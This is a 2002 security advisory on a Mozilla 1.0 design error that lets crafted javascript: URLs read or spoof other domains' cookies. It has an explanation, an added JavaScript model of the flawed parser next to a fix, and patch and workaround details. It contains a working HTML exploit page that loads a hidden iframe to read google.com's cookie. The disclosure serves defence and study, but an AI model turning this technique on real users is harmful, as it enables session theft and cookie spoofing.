
Mozilla cookie can be stolen & spoofed
25th Jul 2002 [SBWID-5555]
COMMAND

	Mozilla cookie can be stolen & spoofed

SYSTEMS AFFECTED

	Mozilla 1.0

PROBLEM

	Thanks to:

	                                                   _     _
	                                                 o' \,=./ `o
	Andreas Sandblad [sandblad@acc.umu.se]              (o o)        advisory [#9]
	---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

	Credits to Ingesson, Quitta, Hawkan.


	BACKGROUND:
	===========

	I originally thought this was an XSS (cross-site scripting) issue, but
	soon came to the conclusion that it is limited to a design error in how
	access to cookies is restricted. Even though Mozilla is open source, I
	have not studied the source code in order to find and exploit the
	vulnerability.

	In the beginning I had problems avoiding javascript errors when using
	the javascript: URL. My first solution was to make the host and path a
	valid javascript expression. google.com is a valid expression if google
	is an object and com is a property of that object. Further, if
	google.com is a number, it is legal to write google.com/ 1 (a
	division). Parsing of host and path stops when a space is found.

	I soon found a much easier solution: simply put a // in front of the
	host and path and a \n before the cookie-reading code. The reason I
	didn't find this directly is that the newline must be created in a
	javascript function; it can't be set directly in a javascript URL.
	

	

	DESCRIPTION:
	============

	Mozilla allows script run through the javascript: protocol to set and
	read cookies. For javascript: URLs the host and path that decide which
	cookies the script may touch are pulled out of the URL itself, as:
	"javascript:[host][path]"

	Cookie security is based only on restricting access to the matching
	host and path; nothing else is checked. By carefully crafting a
	malicious javascript: URL and opening it in a new frame/iframe/window,
	it is possible to read and alter cookies belonging to other domains.
	

	

	DETAILS:
	========

	The easiest way to exploit the vulnerability is to build a javascript:
	URL from inside a javascript function, of the form:

	javascript://[host]/[path]\n[code to read cookie]

	The cookie check still sees [host]/[path], but to the javascript engine
	the leading // turns the host and path into a line comment, so they
	don't generate any javascript errors. The \n must be a real newline
	character (produced by the string escape in script, which is why it
	can't be typed straight into a javascript URL): it ends the comment,
	and the code after it runs with the cookies of [host].
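	The following JavaScript is an added example, not code from the advisory
	or from Mozilla; it models the design error described in BACKGROUND and
	DETAILS so the two parsers can be compared side by side. naiveCookieScope
	is an assumed stand-in for the flawed "javascript:[host][path]"
	extraction (the real parser was not studied), runJavascriptUrl uses eval
	to model what the engine does with the text after "javascript:", and
	correctCookieScope shows the principle behind a fix (assumed, not a
	description of the Mozilla 1.1 patch). The host names, the
	"http://attacker.example" origin and the google object are illustrative
	values constructed for the example.

```javascript
// Added example (not Mozilla code): a model of the cookie-scoping design
// error described in the advisory. The helpers are assumptions that
// reproduce the behaviour the text describes, not Mozilla's real parser.

// Build the crafted URL the way the exploit does. The host/path part sits
// behind "//" so the javascript engine treats it as a line comment; the
// "\n" escape yields a real newline, which ends the comment and lets the
// payload that follows execute.
function craftCookieUrl(host, path, payload) {
  return "javascript://" + host + path + "\n" + payload;
}

// Naive "javascript:[host][path]" extraction modelling the flawed cookie
// check: everything after "javascript:" (minus a leading "//") up to the
// first whitespace is taken as host and path. The script content is never
// considered, so the attacker chooses the cookie scope.
function naiveCookieScope(url) {
  if (!url.startsWith("javascript:")) return null;
  let rest = url.slice("javascript:".length);
  if (rest.startsWith("//")) rest = rest.slice(2);
  const m = /^([^\s\/]+)(\/[^\s]*)?/.exec(rest);
  if (!m) return null;
  return { host: m[1], path: m[2] || "/" };
}

// What the engine does with the same text: evaluate it as script and use
// the completion value (the exploit makes that value an HTML string, which
// becomes the frame's new document). `scope` supplies names such as the
// `google` object from the advisory's "google.com/ 1" trick; eval is used
// deliberately here to model javascript: URL evaluation of attacker text.
function runJavascriptUrl(url, scope = {}) {
  const body = url.slice("javascript:".length);
  const names = Object.keys(scope);
  const run = new Function(...names, "__body", "return eval(__body);");
  return run(...names.map((n) => scope[n]), body);
}

// The principle behind a fix (assumed here, not a description of the
// Mozilla 1.1 patch): a javascript: URL carries no host of its own, so the
// cookie scope must be that of the document that navigated to it, never
// something parsed out of attacker-controlled text.
function correctCookieScope(url, loaderOrigin) {
  if (url.startsWith("javascript:")) return loaderOrigin;
  return new URL(url).origin;
}

// Demonstration with the advisory's payload (constructed input).
const crafted = craftCookieUrl("www.google.com", "/", "'<body onload=alert(document.cookie)>'");
console.log(naiveCookieScope(crafted));            // { host: 'www.google.com', path: '/' }
console.log(runJavascriptUrl(crafted));            // <body onload=alert(document.cookie)>
console.log(runJavascriptUrl("javascript:google.com/ 1", { google: { com: 2 } })); // 2
console.log(correctCookieScope(crafted, "http://attacker.example")); // http://attacker.example
```

	Run it with node. The point of the comparison is that the same string
	yields a google.com cookie scope from the naive extractor while the
	engine sees only a comment followed by the payload; the corrected
	function ignores the URL text entirely and hands back the loader's
	origin, so the attacker's page can only ever reach its own cookies.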
	

	

	EXPLOIT:
	========

	Instructions: Put the exploit in an HTML document on a remote server and
	load it with your Mozilla browser to activate the exploit.
	

	-------------------------- CUT HERE ----------------------------
	<pre>
	Title:      Mozilla cookie stealing/spoofing
	Date:       [2002-07-24]
	Impact:     Steal/spoof arbitrary cookie           _     _
	            using javascript: URLs               o' \,=./ `o
	Author:     Andreas Sandblad, sandblad@acc.umu.se   (o o)
	---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
	This demo will display your google cookie (must exist).
	</pre>

	<body onload=init()>
	<!-- Hidden frame that is navigated to the crafted javascript: URL -->
	<iframe name=f height=0 width=0 style=visibility:hidden></iframe>
	<script>
	function init(){
	  // "//www.google.com/" is taken as the cookie host/path but is a
	  // javascript comment; the "\n" escape ends the comment, and the
	  // string after it becomes the frame's new document, whose onload
	  // runs alert(document.cookie) under www.google.com's cookie scope.
	  f.location = "javascript://www.google.com/\n"+
	    "'<body onload=alert(document.cookie)>'";
	}
	</script>
	-------------------------- CUT HERE ----------------------------

	

SOLUTION

	 Patch
	 =====

	The author has been working with Mozilla to produce a patch. The
	problem is fixed in Mozilla 1.1 Beta, released 2002-07-22.

	 Workaround
	 ==========

	In Preferences->Advanced->Scripts & Plugins, disable access to cookies
	using javascript. This blocks the attack but also breaks any legitimate
	site that reads or sets cookies from script.
